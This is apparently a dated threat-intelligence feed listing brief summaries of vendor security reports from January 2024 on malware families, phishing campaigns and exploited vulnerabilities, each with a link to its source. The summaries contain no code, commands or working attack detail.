Source: https://isc.sans.edu/diary/rss/30572
2024-01-19
Stealthy_Godzilla_Webshell_Exploits_ActiveMQ_Vulnerability
MEDIUM
+
Intel Source:
Trustwave
Intel Name:
Stealthy_Godzilla_Webshell_Exploits_ActiveMQ_Vulnerability
Date of Scan:
2024-01-19
Impact:
MEDIUM
Summary:
Researchers at Trustwave have seen an increase in attacks that take advantage of vulnerabilities in Apache ActiveMQ hosts. In some cases, the compromised hosts serve malicious web shells written as Java Server Pages (JSP). The web shells are made to elude security and signature-based scanners by being hidden inside an unidentified binary format. Interestingly, the web shell is still compiled and run by ActiveMQ's JSP engine even though the binary's file format is unknown.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/apache-activemq-vulnerability-leads-to-stealthy-godzilla-webshell/
2024-01-19
AnyDesk_Installed_With_OScompatible_Package_by_Npm_Trojan
LOW
+
Intel Source:
Phylum
Intel Name:
AnyDesk_Installed_With_OScompatible_Package_by_Npm_Trojan
Date of Scan:
2024-01-19
Impact:
LOW
Summary:
An advanced remote access trojan has been discovered being installed on infected Windows computers by a malicious package that was posted to the npm registry. The package, dubbed "oscompatible," was made available on January 9, 2024, and was downloaded 380 times in total before being removed.
Source: https://blog.phylum.io/npm-package-found-delivering-sophisticated-rat/
2024-01-19
A_Russian_Threat_Group_Using_Malware_to_Target_Western_Officials
MEDIUM
+
Intel Source:
Google Blog
Intel Name:
A_Russian_Threat_Group_Using_Malware_to_Target_Western_Officials
Date of Scan:
2024-01-19
Impact:
MEDIUM
Summary:
Researchers from the Google Threat Analysis Group have examined a number of persistent threats, including COLDRIVER (also referred to as UNC4057, Star Blizzard, and Callisto), a Russian threat group that specializes in credential phishing attacks against prominent figures in NGOs, former military and intelligence officers, and NATO governments.
Source: https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/
2024-01-19
A_new_stealer_named_Atlantida
LOW
+
Intel Source:
Rapid7
Intel Name:
A_new_stealer_named_Atlantida
Date of Scan:
2024-01-19
Impact:
LOW
Summary:
This month, Rapid7 noticed a new stealer called Atlantida. The stealer makes users download a malicious file from a compromised website and uses different techniques such as reflective loading and injection before the stealer itself is loaded. Atlantida has many capabilities, from stealing login information for software like Telegram and Steam, data from several offline cryptocurrency wallets, and browser-stored data, to stealing cryptocurrency wallet browser extension data. It also captures the victim's screen and collects hardware data.
Source: https://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/
2024-01-19
The_use_of_TeamViewer_by_ransomware_deployment
LOW
+
Intel Source:
Huntress
Intel Name:
The_use_of_TeamViewer_by_ransomware_deployment
Date of Scan:
2024-01-19
Impact:
LOW
Summary:
Huntress security analysts recently warned their customers about two disparate endpoints identified as low impacted by ransomware. An investigation into each endpoint illustrated that initial access to each endpoint was achieved via TeamViewer.
Source: https://www.huntress.com/blog/ransomware-deployment-attempts-via-teamviewer
2024-01-19
An_analysis_of_the_DarkGate_AutoIt_Loader
LOW
+
Intel Source:
Splunk
Intel Name:
An_analysis_of_the_DarkGate_AutoIt_Loader
Date of Scan:
2024-01-19
Impact:
LOW
Summary:
The Splunk Threat researchers provided a deep analysis of DarkGate malware and its use of AutoIt in their blog.
Source: https://www.splunk.com/en_us/blog/security/enter-the-gates-an-analysis-of-the-darkgate-autoit-loader.html
2024-01-19
New_Observations_of_Ivanti_Connect_Secure_VPN_Exploitation
MEDIUM
+
Intel Source:
Volexity, CISA
Intel Name:
New_Observations_of_Ivanti_Connect_Secure_VPN_Exploitation
Date of Scan:
2024-01-19
Impact:
MEDIUM
Summary:
Volexity shared the details of new detailed scanning and exploitation by threat actors using still non-public exploits to compromise different devices. Subsequently, Volexity has observed an increase in attacks from various threat actors against Ivanti Connect Secure VPN appliances beginning on January 16th, 2024. The new observations were GIFTEDVISITOR webshell that Volexity scanned for, which led to the initial discovery of over 1,700 compromised Ivanti Connect Secure VPN devices. Also, UTA0178 had made modifications to the in-built Integrity Checker Tool. CISA also issued an Emergency Directive on Ivanti Vulnerabilities.
Source: https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/ https://www.cisa.gov/news-events/alerts/2024/01/19/cisa-issues-emergency-directive-ivanti-vulnerabilities
2024-01-18
A_Massive_Email_Campaign_Brings_TA866_Back
MEDIUM
+
Intel Source:
Proofpoint
Intel Name:
A_Massive_Email_Campaign_Brings_TA866_Back
Date of Scan:
2024-01-18
Impact:
MEDIUM
Summary:
Researchers at Proofpoint have discovered that, following a nine-month hiatus, TA866 has reappeared in email campaign data. Proofpoint stopped a massive campaign of thousands of emails aimed at North America on January 11, 2024. Emails with an invoice theme included PDF attachments with titles like "Document_[10 digits].pdf" and different subject lines like "Project achievements." The PDF files included OneDrive URLs that, when clicked, started a series of steps that eventually led to the malware payload: a WasabiSeed and Screenshotter custom variant.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta866-returns-large-email-campaign
2024-01-18
AI_generated_videos_attacked_Romania
LOW
+
Intel Source:
CyberGeeks
Intel Name:
AI_generated_videos_attacked_Romania
Date of Scan:
2024-01-18
Impact:
LOW
Summary:
Cybergeeks researchers continue to see the threat of AI-generated videos in different industries and recently saw a YouTube ad that presented a "unique" opportunity to invest in stocks. The attackers used a legitimate podcast that was modified using AI. The researchers concluded that the account promoting the unlisted video was compromised.
Source: https://cybergeeks.tech/attackers-target-romania-using-ai-generated-videos/
2024-01-18
Hackers_Install_Mimo_CryptoMiner_And_Mimus_Ransomware
LOW
+
Intel Source:
ASEC
Intel Name:
Hackers_Install_Mimo_CryptoMiner_And_Mimus_Ransomware
Date of Scan:
2024-01-18
Impact:
LOW
Summary:
Recently, ASEC researchers have documented instances where a CoinMiner threat actor named Mimo has installed malware by taking advantage of different vulnerabilities. In March 2022, they installed CoinMiners via a Log4Shell vulnerability exploitation, which is how Mimo, also known as Hezb, was initially discovered.
Source: https://asec.ahnlab.com/en/60440/
2024-01-18
A_Detailed_Analysis_of_Aquabot
LOW
+
Intel Source:
Antiy
Intel Name:
A_Detailed_Analysis_of_Aquabot
Date of Scan:
2024-01-18
Impact:
LOW
Summary:
Researchers from Antiy CERT have discovered a new version of the Mirai botnet that targets a variety of architectures, including x86, ARM, and MIPS. It waits for control instructions to launch DDoS attacks after infecting targets with weak passwords. They gave it the name Aquabot since the botnet file name is derived from "Aqua*".
Source: https://www.antiy.cn/research/notice&report/research_report/Aquabot.html
2024-01-18
A_new_variant_of_the_Mirai_malware_known_as_Rimasuta
MEDIUM
+
Intel Source:
Qianxin
Intel Name:
A_new_variant_of_the_Mirai_malware_known_as_Rimasuta
Date of Scan:
2024-01-18
Impact:
MEDIUM
Summary:
A new variant of the Mirai malware, known as Rimasuta, has recently resurfaced in samples captured by 360netlab in Japan, but has undergone a significant change in its encryption algorithm.
Source: https://blog.xlab.qianxin.com/rimasuta-new-variant-switches-to-chacha20-encryption-en/
2024-01-18
High_Profile_Individuals_Targeted_by_Mint_Sandstorm_Campaign
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
High_Profile_Individuals_Targeted_by_Mint_Sandstorm_Campaign
Date of Scan:
2024-01-18
Impact:
MEDIUM
Summary:
Microsoft researchers have been tracking a specific subset of Mint Sandstorm (PHOSPHORUS) since November 2023. This subset has been observed to target prominent persons who focus on Middle Eastern politics at universities and research institutions in Belgium, France, Gaza, Israel, the United Kingdom, and the United States. During this campaign, Mint Sandstorm attempted to trick targets into downloading infected files by using custom phishing lures. Microsoft discovered novel post-intrusion techniques in a few instances, including the introduction of a brand-new, specially designed backdoor known as MediaPl.
Source: https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
2024-01-18
Info_Stealing_Malware_Potentially_Targeting_Indian_Air_Force
HIGH
+
Intel Source:
Cyble
Intel Name:
Info_Stealing_Malware_Potentially_Targeting_Indian_Air_Force
Date of Scan:
2024-01-18
Impact:
HIGH
Summary:
Researchers at Cyble have discovered a fresh spy operation that might use malware to steal information from the Indian Air Force. The unknown threat actor lured victims with phishing emails that included a link to a malicious .zip file purporting to provide information on Su-30 fighter jets. India authorized the purchase of these aircraft last year in order to support its current defense modernization initiatives.
Source: https://cyble.com/blog/cyber-espionage-attack-on-the-indian-air-force-go-based-infostealer-exploits-slack-for-data-theft/
2024-01-18
The_delivery_of_WorkersDevBackdoor
LOW
+
Intel Source:
Esentire
Intel Name:
The_delivery_of_WorkersDevBackdoor
Date of Scan:
2024-01-18
Impact:
LOW
Summary:
In November 2023, eSentire's Threat Response Unit (TRU) detected WorkersDevBackdoor malware impacting a customer in the business services industry. This malware spreads through malicious online ads, tricking users into downloading it by mimicking legitimate software. Once installed, it secretly collects sensitive information and provides backdoor access to the infected system.
Source: https://www.esentire.com/blog/workersdevbackdoor-delivered-via-malvertising
2024-01-18
Spread_of_LockBit_Ransomware_Using_Word_Documents
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Spread_of_LockBit_Ransomware_Using_Word_Documents
Date of Scan:
2024-01-18
Impact:
MEDIUM
Summary:
Researchers from ASEC have discovered that starting last month, Word files are being used to spread the LockBit ransomware. Notably, malicious Word files were recently discovered to be masquerading as resumes, which is another way that the LockBit ransomware typically spreads. In 2022, it was discovered that the LockBit ransomware spreads using external URLs in Word documents.
Source: https://asec.ahnlab.com/en/60633/
2024-01-18
The_compromise_of_Cisco_devices_by_Volt_Typhoon
MEDIUM
+
Intel Source:
Security Score Card
Intel Name:
The_compromise_of_Cisco_devices_by_Volt_Typhoon
Date of Scan:
2024-01-18
Impact:
MEDIUM
Summary:
The Chinese state-sponsored group Volt Typhoon continues to actively compromise Cisco devices possibly affected by vulnerabilities publicly disclosed in 2019. Approximately 30% of the Cisco RV320/325 devices observed by SecurityScorecard in a 37-day period may have been compromised by Volt Typhoon. The Cisco RV320/325 vulnerability was publicly disclosed in January 2019. The devices are end-of-life, so Cisco has not released and will not release software updates to address vulnerabilities affecting them.
Source: https://resources.securityscorecard.com/research/volt-typhoon
2024-01-18
An_Overview_of_VBS_Script_Driven_Campaigns
LOW
+
Intel Source:
Mcafee
Intel Name:
An_Overview_of_VBS_Script_Driven_Campaigns
Date of Scan:
2024-01-18
Impact:
LOW
Summary:
Researchers at McAfee have observed a complex VBS campaign that uses obfuscated Visual Basic Scripting (VBS). After starting off as a campaign that distributed the AgentTesla malware, it has developed into a multifaceted threat that uses VBS scripts as a flexible delivery system. This campaign serves as an example of a thorough infection procedure that is started by an email-delivered VBS file. It begins with a VBS script that is activated, then it moves via PowerShell stages, using the BitsTransfer tool to retrieve a second PowerShell script.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vbs-script-driven-campaign/
2024-01-17
Microsoft_as_the_top_number_impersonated_brand
LOW
+
Intel Source:
Checkpoint
Intel Name:
Microsoft_as_the_top_number_impersonated_brand
Date of Scan:
2024-01-17
Impact:
LOW
Summary:
In the last quarter of 2023, Microsoft held the top spot as the most impersonated brand, accounting for 33% of all brand phishing attempts. The technology sector stood out as the most targeted industry overall, Check Point researchers said.
Source: https://blog.checkpoint.com/research/microsoft-returns-to-the-top-spot-as-the-most-imitated-brand-in-phishing-attacks-for-q4-2023/
2024-01-17
Analysis_of_Keyholes
LOW
+
Intel Source:
Walmart Global Tech Blog
Intel Name:
Analysis_of_Keyholes
Date of Scan:
2024-01-17
Impact:
LOW
Summary:
Keyhole is a multipurpose VNC/Backconnect component that is heavily utilized by Anubis and IcedID. Although the malware has features that have been previously documented as standard VNC and HDESK capabilities, there doesn't seem to be much technical information available regarding some of the other features that are currently present.
Source: https://medium.com/walmartglobaltech/keyhole-analysis-60302922aa03
2024-01-17
The_New_Botnet_RDDoS
LOW
+
Intel Source:
NSFocus Global
Intel Name:
The_New_Botnet_RDDoS
Date of Scan:
2024-01-17
Impact:
LOW
Summary:
NSFOCUS's Global Threat Hunting System discovered a widespread spread of an unknown elf file, leading to the identification of a new botnet named RDDoS. This botnet, primarily designed for launching DDoS attacks, possesses command execution capabilities, distinguishing it as a formidable threat. The botnet's favored attack method is ICMP_flood, with the United States, Brazil, and France being its primary targets. The analysis reveals the botnet's relatively uncomplicated nature, but its continuous updates and iterations pose an evolving threat. NSFOCUS emphasizes the need for heightened attention to emerging botnet families like RDDoS, emphasizing ongoing monitoring and offering an Anti-DDoS solution to counter this rising threat effectively.
Source: https://nsfocusglobal.com/nsfocus-reveals-new-botnet-family-rddos/
2024-01-17
The_rise_of_infostealers_targeting_macOS
MEDIUM
+
Intel Source:
Sentinelone
Intel Name:
The_rise_of_infostealers_targeting_macOS
Date of Scan:
2024-01-17
Impact:
MEDIUM
Summary:
In this post, SentinelOne shared details on three active infostealers that are currently evading many static signature detection engines.
Source: https://www.sentinelone.com/blog/the-many-faces-of-undetected-macos-infostealers-keysteal-atomic-cherrypie-continue-to-adapt/
2024-01-17
Atomic_Stealer_First_MacOS_Threat_Unveiled
MEDIUM
+
Intel Source:
Russian Panda
Intel Name:
Atomic_Stealer_First_MacOS_Threat_Unveiled
Date of Scan:
2024-01-17
Impact:
MEDIUM
Summary:
Discovered in March 2023, Atomic Stealer is the inaugural macOS-targeting stealer, offering a sophisticated panel for $3000 monthly. Boasting advanced features such as keychain extraction, password retrieval, and browser data theft, it recently evolved with encrypted strings and anti-VM checks. The threat minimizes traces on infected devices, presenting a formidable challenge to cybersecurity. Special thanks to Edward Crowder and @cod3nym for their contributions.
Source: https://russianpanda.com/2024/01/15/Atomic-Stealer-AMOS/
2024-01-17
Facebook_Scammers_Exploit_BBC_Branding_in_Morbid_Scheme
LOW
Intel Source:
Malwarebytes
Intel Name:
Facebook_Scammers_Exploit_BBC_Branding_in_Morbid_Scheme
Date of Scan:
2024-01-17
Impact:
LOW
Summary:
In a recent Facebook scam, cybercriminals employ BBC branding to lure victims into a morbid scheme. The scam involves posts claiming the tragic loss of someone, accompanied by a link to a fake BBC news item about a fatal road accident. The posts tag Facebook friends to trigger curiosity. Clicking on the link redirects users through various steps, likely performing fingerprinting to gather information. The scam uses a URL format like "BBCNEWS-{6 characters}.OMH4.XYZ." While testing, the redirection led to a known source of pop-ups, potentially unwanted programs, and fraudulent sites. The article provides tips on avoiding Facebook scams, including scrutinizing URLs, reaching out to friends outside the platform for verification, being cautious of "free" offers, regular browser updates, changing login credentials, and using browser protection tools. Users are encouraged to report suspicious posts to protect themselves and others from online threats.
Source: https://www.malwarebytes.com/blog/news/2024/01/ill-miss-him-so-much-facebook-scam-uses-bbc-branding-to-lure-victims
2024-01-16
Detailed_Analysis_of_Pure_Malware_Family
LOW
Intel Source:
ANY.RUN
Intel Name:
Detailed_Analysis_of_Pure_Malware_Family
Date of Scan:
2024-01-16
Impact:
LOW
Summary:
Researchers from ANY.RUN have examined PureCrypter, one of the most peculiar crypters, and PureLogs, a multipurpose stealer. They discovered several intriguing samples while reviewing public submissions. What piqued their interest was unusual traffic that appeared to be related to encryption operations on executable files with short keys and high-entropy TCP connections.
Source: https://any.run/cybersecurity-blog/pure-malware-family-analysis/
2024-01-16
Azorult_malware_back
LOW
Intel Source:
Cyble
Intel Name:
Azorult_malware_back
Date of Scan:
2024-01-16
Impact:
LOW
Summary:
Cyble researchers came across renewed activity of the old Azorult malware, which was first identified in 2016 and functions as an information-stealing threat. It can collect diverse data, including browsing history, cookies, login credentials, and cryptocurrency details.
Source: https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/
2024-01-16
Threat_actors_deployed_an_Androxgh0st_malware
HIGH
Intel Source:
CISA
Intel Name:
Threat_actors_deployed_an_Androxgh0st_malware
Date of Scan:
2024-01-16
Impact:
HIGH
Summary:
The FBI and CISA are releasing a joint cybersecurity advisory about the threat associated with threat actors deploying Androxgh0st malware. Androxgh0st malware has been observed establishing a botnet for victim identification and exploitation in target networks.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a https://www.cisa.gov/sites/default/files/2024-01/aa24-016a-known-indicators-of-compromise-associated-with-adroxgh0st-malware_0.pdf
2024-01-16
Phemedrone_Malware_Dropped_by_Windows_SmartScreen_Bug
LOW
Intel Source:
TrendMicro
Intel Name:
Phemedrone_Malware_Dropped_by_Windows_SmartScreen_Bug
Date of Scan:
2024-01-16
Impact:
LOW
Summary:
Trend Micro researchers discovered a malware campaign employing Phemedrone, which exploits a Microsoft Defender SmartScreen vulnerability to bypass Windows security prompts when opening URL files. This open-source info-stealer focuses on extracting data from web browsers, cryptocurrency wallets, and applications like Discord, Steam, and Telegram. The gathered data is then sent to attackers for potential malicious purposes or sale to other threat actors.
Source: https://www.trendmicro.com/en_us/research/24/a/cve-2023-36025-exploited-for-defense-evasion-in-phemedrone-steal.html
2024-01-15
Remcos_RAT_Distributing_via_Webhards
LOW
Intel Source:
ASEC
Intel Name:
Remcos_RAT_Distributing_via_Webhards
Date of Scan:
2024-01-15
Impact:
LOW
Summary:
Researchers from ASEC have discovered that webhards are being used to spread the Remcos RAT malware, which is disguised as adult games. In Korea, webhards and torrents are popular delivery channels for malware.
Source: https://asec.ahnlab.com/en/60270/
2024-01-15
A_Mallox_Ransomware_Victim
LOW
Intel Source:
TrueSec
Intel Name:
A_Mallox_Ransomware_Victim
Date of Scan:
2024-01-15
Impact:
LOW
Summary:
The Mallox threat actor has a history of gaining initial access by taking advantage of vulnerable MSSQL servers. The first signs of the threat actor were discovered during the analysis of an unprotected MSSQL web server. Many dropper PowerShell scripts were found in the AppData directory of the service account that was running the SQL service; the script "alta.ps1" is one example.
Source: https://www.truesec.com/hub/blog/a-victim-of-mallox-ransomware-how-truesec-csirt-fought-back
2024-01-12
An_Analysis_of_Phishing_Email
LOW
Intel Source:
ISC.SANS
Intel Name:
An_Analysis_of_Phishing_Email
Date of Scan:
2024-01-12
Impact:
LOW
Summary:
SANS researchers have discussed how obfuscation works in malicious scripts. They discovered a VB script that poses as a PDF document. As usual, it arrived as a zip archive attached to a phishing email. The filename is "rfw_po_docs_order_sheet_01_10_202400000000_pdf.vbs".
Source: https://isc.sans.edu/diary/One+File+Two+Payloads/30558/
2024-01-12
WordPress_Sites_Are_Infected_by_Balada_Injector
LOW
Intel Source:
Sucuri
Intel Name:
WordPress_Sites_Are_Infected_by_Balada_Injector
Date of Scan:
2024-01-12
Impact:
LOW
Summary:
In a campaign that began in mid-December, a little over 6,700 WordPress websites that used a vulnerable version of the Popup Builder plugin were compromised by the Balada Injector malware.
Source: https://blog.sucuri.net/2024/01/thousands-of-sites-with-popup-builder-compromised-by-balada-injector.html
2024-01-12
UAC_0050_Armed_RemcosRAT_QuasarRAT_RemoteUtilities
MEDIUM
Intel Source:
CERT-UA
Intel Name:
UAC_0050_Armed_RemcosRAT_QuasarRAT_RemoteUtilities
Date of Scan:
2024-01-12
Impact:
MEDIUM
Summary:
CERT-UA researchers have located and examined numerous emails carrying a ZIP archive attachment of the same name. The archive contains a TXT file with a password and a password-protected multivolume RAR archive.
Source: https://cert.gov.ua/article/6277063
2024-01-12
A_New_Exploit_Module_From_DreamBus_Releases_Metabase_Mayhem
LOW
Intel Source:
Zscaler
Intel Name:
A_New_Exploit_Module_From_DreamBus_Releases_Metabase_Mayhem
Date of Scan:
2024-01-12
Impact:
LOW
Summary:
Researchers from Zscaler's ThreatLabz have been tracking the DreamBus malware family, which targets Linux. Other than a few minor bug fixes and slight adjustments to avoid detection by security software, not much has changed in the last several years. Nevertheless, during the past six months the threat actor behind DreamBus has released two new modules that exploit weaknesses in Metabase and Apache RocketMQ.
Source: https://www.zscaler.com/blogs/security-research/dreambus-unleashes-metabase-mayhem-new-exploit-module
2024-01-12
FIFA_World_cyber_threats
LOW
Intel Source:
Trendmicro
Intel Name:
FIFA_World_cyber_threats
Date of Scan:
2024-01-12
Impact:
LOW
Summary:
Trend Micro, a cybersecurity company, played a crucial role in protecting the 2022 FIFA World Cup from cyber threats. They collaborated with law enforcement, particularly INTERPOL, to monitor and report any malicious websites and scams related to the event. Their global threat intelligence was also shared to prevent attacks and mitigate risks. The article delves into the various cyber threats discovered, including fake ticketing systems, live streaming sites, survey scams, and crypto scams. By supporting INTERPOL and the World Cup, Trend Micro fulfilled its mission of making the digital world a safer place.
Source: https://www.trendmicro.com/en_us/research/24/a/trend-micro-defends-fifa-world-cup-from-cyber-threats.html
2024-01-12
The_Medusa_ransomware_capabilities
LOW
Intel Source:
Palo Alto
Intel Name:
The_Medusa_ransomware_capabilities
Date of Scan:
2024-01-12
Impact:
LOW
Summary:
The article discusses the Medusa ransomware and its capabilities, including the use of two drivers to target specific security products and a customized tool for remote deployment. It also mentions the use of remote scripting and Cyrillic scripts, possibly referencing the creators' preferred language. The article provides a list of commands to stop various services on a computer to prevent the ransomware from encrypting files. It also discusses the use of string and RSA encryption for protecting the ransomware's key. The article mentions the escalation of Medusa ransomware activities and a shift towards extortion, as well as the involvement of the Unit 42 Incident Response team in a Medusa incident. It provides protections and mitigations for Palo Alto Networks customers and discusses the tools and techniques used by the Medusa group, including webshells and defense evasion techniques.
Source: https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/
2024-01-12
Denmark_and_Ukraines_Energy_Sector_Attacks
MEDIUM
Intel Source:
Forescout
Intel Name:
Denmark_and_Ukraines_Energy_Sector_Attacks
Date of Scan:
2024-01-12
Impact:
MEDIUM
Summary:
Forescout researchers have analyzed two newly publicized attacks targeting the energy sectors in Denmark and Ukraine. So far, the attacks have been linked, if tenuously, to the Russian military threat actor Sandworm, one of the most well-known APT organizations operating at the moment.
Source: https://www.forescout.com/resources/clearing-the-fog-of-war/
2024-01-11
Ivanti_Connect_Secure_VPN_Exploited
MEDIUM
Intel Source:
Volexity
Intel Name:
Ivanti_Connect_Secure_VPN_Exploited
Date of Scan:
2024-01-11
Impact:
MEDIUM
Summary:
Researchers from Volexity have discovered that two vulnerabilities in Ivanti Connect Secure VPN devices allowing unauthenticated remote code execution are now being exploited in the wild.
Source: https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/
2024-01-11
Mac_users_facing_a_New_Year_threat_with_the_Obfuscated_Atomic_Stealer
LOW
Intel Source:
Malwarebytes
Intel Name:
Mac_users_facing_a_New_Year_threat_with_the_Obfuscated_Atomic_Stealer
Date of Scan:
2024-01-11
Impact:
LOW
Summary:
Malwarebytes researchers discovered an upgraded version of the Atomic Stealer, actively targeting Mac users through malicious ads on Google Search. This insidious threat is specifically designed to harvest passwords and other sensitive files that are usually restricted in access.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/01/atomic-stealer-rings-in-the-new-year-with-updated-version
2024-01-11
FBot_Malware_Targeting_Cloud_and_Payment_Services
LOW
Intel Source:
Sentinelone
Intel Name:
FBot_Malware_Targeting_Cloud_and_Payment_Services
Date of Scan:
2024-01-11
Impact:
LOW
Summary:
Researchers at SentinelLabs have discovered a Python-based hacking tool called FBot that is distinct from previous families of cloud malware. It targets cloud services, SaaS platforms, and web servers, including Office365, AWS, PayPal, Sendgrid, and Twilio.
Source: https://www.sentinelone.com/labs/exploring-fbot-python-based-malware-targeting-cloud-and-payment-services/
2024-01-10
Turkish_Hackers_Target_MSSQL_servers_to_deliver_MIMIC_Ransomware
MEDIUM
Intel Source:
Securonix
Intel Name:
Turkish_Hackers_Target_MSSQL_servers_to_deliver_MIMIC_Ransomware
Date of Scan:
2024-01-10
Impact:
MEDIUM
Summary:
Financially motivated Turkish threat actors appear to be actively targeting MSSQL servers in an effort to deliver MIMIC ransomware payloads. The Securonix Threat Research team has been monitoring an ongoing campaign, RE#TURGENCE, which involves the targeting and exploitation of MSSQL database servers to gain initial access. The threat actors appear to be targeting US, EU, and LATAM countries and are financially motivated.
Source: https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/
2024-01-10
Hackers_Targeting_YouTube_Channels_to_Scatter_Lumma_Stealer
LOW
Intel Source:
Fortinet
Intel Name:
Hackers_Targeting_YouTube_Channels_to_Scatter_Lumma_Stealer
Date of Scan:
2024-01-10
Impact:
LOW
Summary:
Researchers at FortiGuard Labs have identified a threat group using YouTube channels to spread a Lumma Stealer variant. This actor targets sensitive information, including user credentials, system details, browser data, and extensions.
Source: https://www.fortinet.com/blog/threat-research/lumma-variant-on-youtube
2024-01-10
A_new_attack_targeting_Apache_Hadoop_and_Flink_applications
LOW
Intel Source:
Aquasec
Intel Name:
A_new_attack_targeting_Apache_Hadoop_and_Flink_applications
Date of Scan:
2024-01-10
Impact:
LOW
Summary:
The article discusses a new cyber attack targeting Apache Hadoop and Flink applications, which was uncovered by researchers at Aqua Nautilus. The attack involves the use of packers and rootkits to conceal the malware, making it difficult for traditional security defenses to detect. The attack exploits a misconfiguration in the ResourceManager of Hadoop YARN, allowing unauthenticated users to create and run applications.
Source: https://blog.aquasec.com/threat-alert-apache-applications-targeted-by-stealthy-attacker
2024-01-10
Protection_analysis_against_GuLoader_and_RedLine_Stealer_malware
LOW
Intel Source:
Palo Alto
Intel Name:
Protection_analysis_against_GuLoader_and_RedLine_Stealer_malware
Date of Scan:
2024-01-10
Impact:
LOW
Summary:
Palo Alto Networks Unit 42 described selected configuration-protection techniques employed by two malware families: GuLoader and RedLine Stealer.
Source: https://unit42.paloaltonetworks.com/malware-configuration-extraction-techniques-guloader-redline-stealer/#post-131796-_v8176g40kstn
2024-01-10
User_agent_web_resource_connection
LOW
Intel Source:
ISC.SANS
Intel Name:
User_agent_web_resource_connection
Date of Scan:
2024-01-10
Impact:
LOW
Summary:
Jesse La Grew, ISC SANS researcher, explained in his diary how devices connect to different web resources on a regular basis, and that one method of identifying what is connecting to a web resource is through the user agent.
Source: https://isc.sans.edu/diary/rss/30536
2024-01-10
New_Year_themed_spam_emails_campaign
LOW
Intel Source:
Cyble
Intel Name:
New_Year_themed_spam_emails_campaign
Date of Scan:
2024-01-10
Impact:
LOW
Summary:
Cyble researchers discovered a ZIP archive file that could potentially spread through New Year-themed spam emails. The ZIP attachment contains a shortcut file disguised as a PNG image.
Source: https://cyble.com/blog/festive-facade-dissecting-multi-stage-malware-in-new-year-themed-lure/
2024-01-10
Ducktail_and_Peeling_PowerShell_Layers
LOW
Intel Source:
Esentire
Intel Name:
Ducktail_and_Peeling_PowerShell_Layers
Date of Scan:
2024-01-10
Impact:
LOW
Summary:
The eSentire Threat Response Unit discovered a failed attempt to infect a customer's employee, who worked in digital marketing at a business services company, with Ducktail malware. The employee received a private message from Ducktail distributors on LinkedIn, along with an attachment that opened a ZIP archive.
Source: https://www.esentire.com/blog/ducktail-and-peeling-the-layers-of-powershell
2024-01-10
Deep_analysis_of_a_mining_threat_spreaded_through_a_YouTube
LOW
Intel Source:
Cyfirma
Intel Name:
Deep_analysis_of_a_mining_threat_spreaded_through_a_YouTube
Date of Scan:
2024-01-10
Impact:
LOW
Summary:
This comprehensive analysis delves into the dissemination of cryptocurrency miners through a YouTube channel. Examining the tactics employed, the report reveals a concerning trend of malicious actors leveraging popular video-sharing platforms to distribute mining threats. The study explores the various evasion techniques employed by threat actors to avoid detection. Additionally, it sheds light on the processes for generating resilient malware payloads.
Source: https://www.cyfirma.com/outofband/decoding-the-cryptocurrency-malware-landscape-a-comprehensive-analysis-of-a-mining-threat-disseminated-through-a-youtube-channel/
2024-01-10
A_Novel_Advanced_Malware_Attack_on_Microsoft_Office
MEDIUM
Intel Source:
ForcePoint
Intel Name:
A_Novel_Advanced_Malware_Attack_on_Microsoft_Office
Date of Scan:
2024-01-10
Impact:
MEDIUM
Summary:
Researchers from Forcepoint X-Labs have discovered a sophisticated Microsoft Office-based attack that targets well-known corporate executives just before a nation's general elections.
Source: https://www.forcepoint.com/blog/x-labs/advanced-malware-attack-using-microsoft-office
2024-01-10
Storm_1152_used_their_CAPTCHA_cracking_capabilities
LOW
Intel Source:
Garwarner
Intel Name:
Storm_1152_used_their_CAPTCHA_cracking_capabilities
Date of Scan:
2024-01-10
Impact:
LOW
Summary:
Microsoft's Digital Crimes Unit posted a deep analysis of how it disrupts cybercrime. In the post they discuss the case against the hacking group called Storm-1152. The DCU team assesses that Storm-1152 used its CAPTCHA-cracking capabilities to assist other criminals in the mass creation of Microsoft email accounts, such as Hotmail and Outlook accounts. Some 750 million email accounts were created for illicit purposes.
Source: https://garwarner.blogspot.com/2023/12/vietnams-massive-captcha-crackers-vs.html
2024-01-10
Syrian_Hackers_Distributing_Stealthy_C_Sharp_Based_Silver_RAT
LOW
Intel Source:
Cyfirma
Intel Name:
Syrian_Hackers_Distributing_Stealthy_C_Sharp_Based_Silver_RAT
Date of Scan:
2024-01-10
Impact:
LOW
Summary:
Researchers at Cyfirma have shed light on how RAT development is changing and on the nefarious actions carried out by threat actors going by the handle "Anonymous Arabic." The researchers examined the Silver RAT, which is written in C# and can discreetly launch browsers, hidden apps, keyloggers, and other dangerous programs while evading antivirus software.
Source: https://www.cyfirma.com/outofband/a-gamer-turned-malware-developer-diving-into-silverrat-and-its-syrian-roots/
2024-01-10
Pikabot_Malware_Thirstily_Involved_In_Spam_Campaigns
HIGH
Intel Source:
TrendMicro
Intel Name:
Pikabot_Malware_Thirstily_Involved_In_Spam_Campaigns
Date of Scan:
2024-01-10
Impact:
HIGH
Summary:
Trend Micro researchers report that Pikabot is actively involved in spam campaigns that result in ransomware attacks using Black Basta. Pikabot consists of a loader and a core module; the core module allows unauthorized remote access and the execution of arbitrary commands over an established connection with the C&C server, and the operators use these two components to target victims through phishing campaigns.
Source: https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html
2024-01-08
Dutch_IT_And_Telecom_Firms_Targeted_by_Turkish_Sea_Turtles_Group
LOW
